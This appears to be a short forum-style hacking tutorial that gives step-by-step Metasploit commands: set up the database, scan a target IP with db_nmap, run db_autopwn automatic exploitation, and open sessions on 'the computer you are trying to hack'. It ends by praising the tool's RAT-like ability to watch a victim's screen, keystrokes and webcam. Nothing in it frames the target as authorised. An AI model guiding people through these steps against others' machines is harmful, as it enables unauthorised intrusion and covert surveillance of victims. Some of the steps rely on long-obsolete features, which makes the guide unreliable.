1.) First you need to download Metasploit. The most up-to-date version is FREE at metasploit.com.2.) You need PostgrSQL for your database. Download here: http://www.postgresql.org/. Make sure you use all the defaults or Metasploit woun't work!
3.) Now lets get down to buisness... After installing both tools, open up the PostgrSQL admin gui (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III). Then right-click on your server (in the left hand box) and click connect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5...
[Image: pgadmin.bmp]
4.) Time for some hacking! Go to start -> all programs -> Metasploit Framework, and then open the Metasploit gui. Let it load untill it look like this:
[Image: metasploit.bmp]
5.) Now, in the window type:
db_connect postgres:ThePassYouChose@localhost:5432
6.)Type db_host to make sure you are connected correctally.
7.)Now type this:
db_nmap 000.000.000.000
Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000...
8.) Now we get to the fun part; the automatic exploitation. Just type db_autopwn -t -p -e -s -b , watch the auto-exploitation start, go play Halo for a while, and then come back...
9.) After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.
sessions -i ExploitNumber
___________________________________________________________
The features of Metasploit are mutch like a rat. Once you get into someone's computer, you can see their screen, controll their mouse, see what they type, see them, etc.
Keep Visiting